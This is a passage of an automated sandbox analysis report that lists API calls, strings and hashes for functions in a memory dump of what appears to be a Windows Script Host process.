Part of subcall function 00007FF7C0BA3E74: RtlVirtualUnwind.KERNEL32 ref: 00007FF7C0BA3EEB
Part of subcall function 00007FF7C0BA3E74: __raise_securityfailure.LIBCMT ref: 00007FF7C0BA3F61

Strings

false, xrefs: 00007FF7C0BA1C70

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ByteCharMultiWide$QueryValue$CaptureContextEntryErrorFunctionLastLookupUnwindVirtual__raise_securityfailure
String ID: false
API String ID: 886426149-734881840
Opcode ID: f3c35b03c21a127fca322f538f188cf2bff3ea4f782f9762f9d45d8659069629
Instruction ID: a2beee3173e64e824054daef45ad4991459fe29b404fc5be36880f73a5f0bf0e
Opcode Fuzzy Hash: f3c35b03c21a127fca322f538f188cf2bff3ea4f782f9762f9d45d8659069629
Instruction Fuzzy Hash: 7461A832A0968296E761EF209C402B9A391FB44774FD04735DA6E8ABD4EF3CF565C360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9AE8C, Relevance: 12.1, APIs: 8, Instructions: 95
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7C0BA3B74: _malloc_dbg.MSVCRT ref: 00007FF7C0BA3B92

GetCurrentThreadId.KERNEL32 ref: 00007FF7C0B9AECF
CreateEventA.KERNEL32(?,?,?,?,?,00007FF7C0B94707), ref: 00007FF7C0B9AEF9
GetLastError.KERNEL32(?,?,?,?,?,00007FF7C0B94707), ref: 00007FF7C0B9AF08
CreateThread.KERNELBASE ref: 00007FF7C0B9AF3A
FindCloseChangeNotification.KERNELBASE ref: 00007FF7C0B9AF56
CloseHandle.KERNEL32 ref: 00007FF7C0B9AF8B
PostMessageA.USER32 ref: 00007FF7C0B9AFAB
CloseHandle.KERNEL32 ref: 00007FF7C0B9AFC3

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: Close$CreateHandleThread$ChangeCurrentErrorEventFindLastMessageNotificationPost_malloc_dbg
String ID:
API String ID: 2839672009-0
Opcode ID: 34be2e6c7270c755f925dc974c5d37c4b09d32dfab03a69e4b4c014137943224
Instruction ID: 1494377e5c559c31c4912e473d9e3f7c826ff50560347e9abf695b2f7024c507
Opcode Fuzzy Hash: 34be2e6c7270c755f925dc974c5d37c4b09d32dfab03a69e4b4c014137943224
Instruction Fuzzy Hash: CA414762A19B0282EB55FF21E850339A2B1EF84B64F954535DA4E86B94DF3CE41082E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA14A0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B9D27D), ref: 00007FF7C0BA1502
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B9D27D), ref: 00007FF7C0BA1547
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B9D27D), ref: 00007FF7C0BA1554
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B9D27D), ref: 00007FF7C0BA15AA
RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B9D27D), ref: 00007FF7C0BA15D8

Strings

Software\Microsoft\Windows Script Host\Settings, xrefs: 00007FF7C0BA14E4, 00007FF7C0BA1529, 00007FF7C0BA1583

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ByteCharCreateMultiWide$ErrorLast
String ID: Software\Microsoft\Windows Script Host\Settings
API String ID: 3494534822-2126348837
Opcode ID: ddc53624f6f18bdc7fa86a126e217078bd4e8b6c1a540d8d6138741a87631fd4
Instruction ID: 77e3f311bc64bb627c30941a76e7b5357f6af0f8b17d4007cc80d9725a601f05
Opcode Fuzzy Hash: ddc53624f6f18bdc7fa86a126e217078bd4e8b6c1a540d8d6138741a87631fd4
Instruction Fuzzy Hash: 0F41B372A18B9286D751DF21AC4056AB3E4FB847B0B941739EA9F82FD4CF3CE4608750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA0CC4, Relevance: 4.6, APIs: 3, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec99bbded9b97218ae828d37f134b296c31e44e973d5a4c897941c505b79f1be
Instruction ID: 774ec074d91091db9b1866e47961b4356f473eb2bc4d0f5e723a278375c56578
Opcode Fuzzy Hash: ec99bbded9b97218ae828d37f134b296c31e44e973d5a4c897941c505b79f1be
Instruction Fuzzy Hash: F3314433B186428AD705DF9AE85496CE3A1EB94BA4F908135DE4ECB754DF3CF8508790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9AE00, Relevance: 4.5, APIs: 3, Instructions: 39nativeCOMMON

Download Yara Rule

APIs

GetWindowLongPtrA.USER32 ref: 00007FF7C0B9AE29
SetWindowLongPtrA.USER32 ref: 00007FF7C0B9AE48

Part of subcall function 00007FF7C0B9AC78: KillTimer.USER32 ref: 00007FF7C0B9ACE9
Part of subcall function 00007FF7C0B9AC78: GetLastError.KERNEL32 ref: 00007FF7C0B9ACF3

NtdllDefWindowProc_A.NTDLL ref: 00007FF7C0B9AE61

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: Window$Long$ErrorKillLastNtdllProc_Timer
String ID:
API String ID: 3207012407-0
Opcode ID: ce805b3e4bd65099b887d72d245e6461995e58dba14bbf82e0f3cbd5291331c6
Instruction ID: 83c591efa8c06cf1acf7adcb0e9f41820a2c94f140eedee0279f4a83251df95d
Opcode Fuzzy Hash: ce805b3e4bd65099b887d72d245e6461995e58dba14bbf82e0f3cbd5291331c6
Instruction Fuzzy Hash: 92017821A08B4582E614AF52AC40069B764FB99FE0B984031EF9A57BA5DF38E8528780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA0E04, Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL ref: 00007FF7C0BA0E37
GetVersionExA.KERNEL32 ref: 00007FF7C0BA0E4B

Part of subcall function 00007FF7C0BA0EC4: GetUserDefaultLangID.KERNELBASE ref: 00007FF7C0BA0F07
Part of subcall function 00007FF7C0BA0EC4: GetLocaleInfoW.KERNEL32 ref: 00007FF7C0BA0F26

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CriticalDefaultInfoInitializeLangLocaleSectionUserVersion
String ID:
API String ID: 3795852257-0
Opcode ID: b6402d8bdc24367f0f7176ac030f8f89b9feb6f391a38c2ebaf239520a0f26d0
Instruction ID: 1523ec8913e5d301f8da0607c2558cacf1473dba76c3ae3b32f05201b3957415
Opcode Fuzzy Hash: b6402d8bdc24367f0f7176ac030f8f89b9feb6f391a38c2ebaf239520a0f26d0
Instruction Fuzzy Hash: 7A110A2191D653CAFA62EF50AC54379B290EB54329FC40536D18E81754CF3CB869DAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B941A8, Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 173
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32 ref: 00007FF7C0B941C9
FreeLibrary.KERNEL32 ref: 00007FF7C0B941E8
FreeLibrary.KERNEL32 ref: 00007FF7C0B941FA
RtlDeleteCriticalSection.NTDLL ref: 00007FF7C0B94207
GetCommandLineW.KERNEL32 ref: 00007FF7C0B94223
wcscpy_s.MSVCRT ref: 00007FF7C0B9427A

Part of subcall function 00007FF7C0BA07DC: wcscpy_s.MSVCRT ref: 00007FF7C0BA0860

Part of subcall function 00007FF7C0BA3B74: _malloc_dbg.MSVCRT ref: 00007FF7C0BA3B92

FreeLibrary.KERNEL32 ref: 00007FF7C0B943D8
FreeLibrary.KERNEL32 ref: 00007FF7C0B943EA
RtlDeleteCriticalSection.NTDLL ref: 00007FF7C0B943F7

Strings

embedding, xrefs: 00007FF7C0B94385
regserver, xrefs: 00007FF7C0B94346
unregserver, xrefs: 00007FF7C0B94368

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: FreeLibrary$CriticalDeleteSectionwcscpy_s$CommandInitializeLine_malloc_dbg
String ID: embedding$regserver$unregserver
API String ID: 3628751982-3133065212
Opcode ID: 4ab481a69f424f93535b056e07248f5276efbb3594449536d994cc3ff8c7c98f
Instruction ID: 51ed036c316dd58f440a1f23cd94aef4ed1064badc968e016155b7465c81e05f
Opcode Fuzzy Hash: 4ab481a69f424f93535b056e07248f5276efbb3594449536d994cc3ff8c7c98f
Instruction Fuzzy Hash: DD616921A0D64381EA15FF62AD11579E2A0BF85BB0F804535ED1FC6BA1EF3CF46582A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B95BFC, Relevance: 21.4, APIs: 9, Strings: 3, Instructions: 378
libraryloaderwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetACP.KERNEL32 ref: 00007FF7C0B95C58
LoadLibraryExW.KERNEL32 ref: 00007FF7C0B95CDA
GetProcAddress.KERNEL32 ref: 00007FF7C0B95CF2
FreeLibrary.KERNEL32 ref: 00007FF7C0B95D00
FreeLibrary.KERNEL32 ref: 00007FF7C0B95D59
CoRegisterMessageFilter.OLE32 ref: 00007FF7C0B95DA5
GetModuleFileNameW.KERNEL32 ref: 00007FF7C0B95DD8

Strings

kernel32.dll, xrefs: 00007FF7C0B95CCD
W, xrefs: 00007FF7C0B9600C
HeapSetInformation, xrefs: 00007FF7C0B95CE8

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: Library$Free$AddressFileFilterLoadMessageModuleNameProcRegister
String ID: HeapSetInformation$W$kernel32.dll
API String ID: 2721285356-3363034650
Opcode ID: 0e5f7894d6b3d09ce34e09711cc341d99b6aa25c41325597481ea016ab6934ef
Instruction ID: c75a8674c2e052ef7e9a89d39c30e2b9ca9ea6edb7e7993d34b6ce43b3dbe143
Opcode Fuzzy Hash: 0e5f7894d6b3d09ce34e09711cc341d99b6aa25c41325597481ea016ab6934ef
Instruction Fuzzy Hash: 8F029532A086C286EB21DF25DD406E9B7B4EF45B98F844035CA4E87B55DF39F621C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B94428, Relevance: 16.7, APIs: 11, Instructions: 163
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 00007FF7C0B9446C
GetVersionExA.KERNEL32 ref: 00007FF7C0B944AA
IsTextUnicode.ADVAPI32 ref: 00007FF7C0B944D0
SysAllocStringLen.OLEAUT32 ref: 00007FF7C0B9456A
MultiByteToWideChar.KERNEL32 ref: 00007FF7C0B94595
GetLastError.KERNEL32 ref: 00007FF7C0B945A2
SysFreeString.OLEAUT32 ref: 00007FF7C0B94617

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: String$Alloc$ByteCharErrorFreeLastMultiTextUnicodeVersionWide
String ID:
API String ID: 1844124450-0
Opcode ID: afe976a9d5503695198e612cc8e9e105db2e460a831b35614bac886ece7dfef1
Instruction ID: 8cea781942259fec0e86c6f1b4fa74614db19e1903564153d51ccb55ffe1935a
Opcode Fuzzy Hash: afe976a9d5503695198e612cc8e9e105db2e460a831b35614bac886ece7dfef1
Instruction Fuzzy Hash: 68519265A0874247FA61EF55AD00A39E2A0BF657B4F914234CE5BC7B90DF3CB81586A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9AFF0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassInfoA.USER32 ref: 00007FF7C0B9B024
RegisterClassA.USER32 ref: 00007FF7C0B9B056
SetEvent.KERNEL32 ref: 00007FF7C0B9B065
GetLastError.KERNEL32 ref: 00007FF7C0B9B06B
CreateWindowExA.USER32 ref: 00007FF7C0B9B0B4
SetEvent.KERNEL32 ref: 00007FF7C0B9B0C9
DispatchMessageA.USER32 ref: 00007FF7C0B9B0DA
GetMessageA.USER32 ref: 00007FF7C0B9B0ED

Strings

WSH-Timer, xrefs: 00007FF7C0B9B00A

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ClassEventMessage$CreateDispatchErrorInfoLastRegisterWindow
String ID: WSH-Timer
API String ID: 2425405920-2323048385
Opcode ID: 3a91365441e18503799be1ea7b991465d2dd856b64461b16883ca5379667b303
Instruction ID: 5abafc81203f549198b2ebd7aa74dfea4b62b7ea313d0dfed4b3246b2e03dbf4
Opcode Fuzzy Hash: 3a91365441e18503799be1ea7b991465d2dd856b64461b16883ca5379667b303
Instruction Fuzzy Hash: 92315232A18B42DAD750DF65EC80669B3B0FB487A4F905136DA4E83F54DF38E564C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B962B0, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(?,?,?,?,?,?,?,00007FF7C0B947E9), ref: 00007FF7C0B962D7
GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF7C0B947E9), ref: 00007FF7C0B962E5
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00007FF7C0B947E9), ref: 00007FF7C0B96308
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00007FF7C0B947E9), ref: 00007FF7C0B96320
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00007FF7C0B947E9), ref: 00007FF7C0B963AC

Strings

WldpIsClassInApprovedList, xrefs: 00007FF7C0B96316
WldpGetLockdownPolicy, xrefs: 00007FF7C0B962FE
WLDP.DLL, xrefs: 00007FF7C0B962CA

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: AddressLibraryProc$ErrorFreeLastLoad
String ID: WLDP.DLL$WldpGetLockdownPolicy$WldpIsClassInApprovedList
API String ID: 1004692917-3104440107
Opcode ID: d0c7597ecaa580b8324df83a41a0d49710e2127081c38c1a8e0b6c62d99b8303
Instruction ID: 3bc87a872b11351589a038b7e4666dfe58fb38bbbfdf6b9476598dfa40db8861
Opcode Fuzzy Hash: d0c7597ecaa580b8324df83a41a0d49710e2127081c38c1a8e0b6c62d99b8303
Instruction Fuzzy Hash: D2217131A08B4282E715EF26E94027AB2A4FB487A0F844135DE8F86B94DF3CE555C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B970B0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 96
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7C0BA134C: RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,00000000,?,00000000,00007FF7C0B96FD2), ref: 00007FF7C0BA1398

RegCloseKey.KERNELBASE ref: 00007FF7C0B971E1
RegCloseKey.ADVAPI32 ref: 00007FF7C0B971F0

Part of subcall function 00007FF7C0BA1A34: RegQueryValueExW.KERNELBASE ref: 00007FF7C0BA1A96

Strings

UseWINSAFER, xrefs: 00007FF7C0B97150, 00007FF7C0B971A2
IgnoreUserSettings, xrefs: 00007FF7C0B970F8
TrustPolicy, xrefs: 00007FF7C0B97136, 00007FF7C0B9717B
Software\Microsoft\Windows Script Host\Settings, xrefs: 00007FF7C0B970CC, 00007FF7C0B97114

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: Close$OpenQueryValue
String ID: IgnoreUserSettings$Software\Microsoft\Windows Script Host\Settings$TrustPolicy$UseWINSAFER
API String ID: 1607946009-2293819020
Opcode ID: 8563d692243e40ef3ece6761c209279db69629fbdca1044d1ad62409f400f529
Instruction ID: 20cf04b0d67d2934ebf38e52e09cdc7d26c8debce5de2ca3afdee365ad27a0c5
Opcode Fuzzy Hash: 8563d692243e40ef3ece6761c209279db69629fbdca1044d1ad62409f400f529
Instruction Fuzzy Hash: 5F41A062A0561299EB51EF75DC803F8A7E0AF007A4FC40532E90F96B99DF3CE585C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B94654, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF7C0B9473F

Part of subcall function 00007FF7C0B9AE8C: GetCurrentThreadId.KERNEL32 ref: 00007FF7C0B9AECF

SysAllocString.OLEAUT32 ref: 00007FF7C0B94760

Part of subcall function 00007FF7C0B94F18: UnmapViewOfFile.KERNEL32 ref: 00007FF7C0B94F9F
Part of subcall function 00007FF7C0B94F18: FindCloseChangeNotification.KERNELBASE ref: 00007FF7C0B94FAF
Part of subcall function 00007FF7C0B94F18: CloseHandle.KERNEL32 ref: 00007FF7C0B94FBE

Part of subcall function 00007FF7C0B962B0: LoadLibraryW.KERNELBASE(?,?,?,?,?,?,?,00007FF7C0B947E9), ref: 00007FF7C0B962D7
Part of subcall function 00007FF7C0B962B0: GetLastError.KERNEL32(?,?,?,?,?,?,?,00007FF7C0B947E9), ref: 00007FF7C0B962E5
Part of subcall function 00007FF7C0B962B0: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00007FF7C0B947E9), ref: 00007FF7C0B963AC

FindCloseChangeNotification.KERNELBASE ref: 00007FF7C0B947EE

Part of subcall function 00007FF7C0B96B8C: LoadLibraryExW.KERNEL32(?,?,?,?,?,00007FF7C0B948A9), ref: 00007FF7C0B96BD0
Part of subcall function 00007FF7C0B96B8C: GetLastError.KERNEL32(?,?,?,?,?,00007FF7C0B948A9), ref: 00007FF7C0B96BE9

SysFreeString.OLEAUT32 ref: 00007FF7C0B9498B

Strings

.wsf, xrefs: 00007FF7C0B9486D

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: CloseLibraryString$AllocChangeErrorFindFreeLastLoadNotification$CurrentFileHandleThreadUnmapView
String ID: .wsf
API String ID: 668663949-2429851548
Opcode ID: 6f3682eb65fe35bb060f5c697f860dff5e035ef5d185db1939380b89302bb8c6
Instruction ID: 6db4677ccf1a99b2fe6409c4d6cbc91a926ea1855514b4f61223b579b76b6088
Opcode Fuzzy Hash: 6f3682eb65fe35bb060f5c697f860dff5e035ef5d185db1939380b89302bb8c6
Instruction Fuzzy Hash: 35918F21B08B9286EA55EF669C8067AE3A0AF45BE4F804135DE0FC7795DF3DF41183A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B9B110, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 199memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7C0BA3B74: _malloc_dbg.MSVCRT ref: 00007FF7C0BA3B92

SysAllocString.OLEAUT32 ref: 00007FF7C0B9B213
memcpy.MSVCRT ref: 00007FF7C0B9B286
SysAllocString.OLEAUT32 ref: 00007FF7C0B9B297
LoadTypeLib.OLEAUT32 ref: 00007FF7C0B9B2CF

Strings

., xrefs: 00007FF7C0B9B253

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: AllocString$LoadType_malloc_dbgmemcpy
String ID: .
API String ID: 1856389451-248832578
Opcode ID: 9e24f8ce75da09a248b20cc0b8c071a973126f9becfa49865a23222ceeaed76d
Instruction ID: d58e61cad26d48297cb7011e9c8ba1af23e7340f5757ee80f97252193184e9c0
Opcode Fuzzy Hash: 9e24f8ce75da09a248b20cc0b8c071a973126f9becfa49865a23222ceeaed76d
Instruction Fuzzy Hash: 3081AD32718B4292EB15EF26ED90569B3A0FB48BA4F844135CA4E83B54DF3CF565C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0B955B4, Relevance: 7.6, APIs: 5, Instructions: 133COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.KERNELBASE ref: 00007FF7C0B955FE
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B95E5C), ref: 00007FF7C0B9560B
GetFileVersionInfoW.KERNELBASE ref: 00007FF7C0B95652
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B95E5C), ref: 00007FF7C0B956CE
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7C0B95E5C), ref: 00007FF7C0B95738

Memory Dump Source

Source File: 00000007.00000002.457335255.00007FF7C0B91000.00000020.00020000.sdmp, Offset: 00007FF7C0B90000, based on PE: true

Associated: 00000007.00000002.457316390.00007FF7C0B90000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457446228.00007FF7C0BA5000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.457498941.00007FF7C0BAF000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.457534702.00007FF7C0BB0000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff7c0b90000_ibfmvoj.jbxd

Similarity

API ID: ByteCharFileInfoMultiVersionWide$ErrorLastSize
String ID:
API String ID: 4124070594-0
Opcode ID: e01c0beddb0a21be13c676d1829fd80cc06223eb7a0d0fdeb27590302d015e76
Instruction ID: 7ea5e85cabdefd6847fb9f6a4dac5bf7c88ea47ff54396b2264fd15bc52aad53
Opcode Fuzzy Hash: e01c0beddb0a21be13c676d1829fd80cc06223eb7a0d0fdeb27590302d015e76
Instruction Fuzzy Hash: 1C517422614A4286EB14DF35DD443A9A3A0FB45BB4FD48335EA2A87BD4DF3CE515C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7C0BA1780, Relevance: 7.6, APIs: 5, Instructions: 96registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE ref: 00007FF7C0BA17D7
